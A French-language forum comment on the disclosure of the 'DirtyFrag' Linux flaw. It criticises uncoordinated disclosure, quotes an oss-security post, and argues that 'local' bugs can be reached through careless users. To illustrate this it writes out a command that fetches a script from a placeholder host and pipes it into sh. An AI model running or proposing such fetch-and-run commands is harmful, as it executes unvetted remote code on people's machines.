• [^] # Re: comme d'habitude ?

    Posté par (site web personnel) . En réponse au journal Et ça continue [DirtyFrag]. Évalué à 6 (+4/-0). Dernière modification le 08 mai 2026 à 21:40.

    Ça n'a pas été fait dans les règles

    effectivement

    peut-être parce que les entreprises ayant découvert ces failles cherchent à faire un maximum de bruit pour se faire de la publicité.

    pour Dirty Frag on peut laisser le bénéfice du doute suite à https://www.openwall.com/lists/oss-security/2026/05/07/12 vu en lien de https://lwn.net/Articles/1071775/

    I had no contact with anyone on the linux-distros embargo, no awareness
    of the May 12 disclosure date, and no access to Kim's write-up or PoC.

    le gars se base sur une CVE et ne se coordonne avec personne, m'enfin bon :/

    Concernant la dénomination de faille « locale », ça se contourne facilement et peut toucher tout utilisateur fervent adepte du curl http://pourleszozos.example.com | sh (bref, toute ICC1 défaillante) ou une faille éventuelle de chromium / firefox permettant d'exécuter du code...


    1. ICC ou Interface Chaise-Clavier, le principal maillon faible ;-)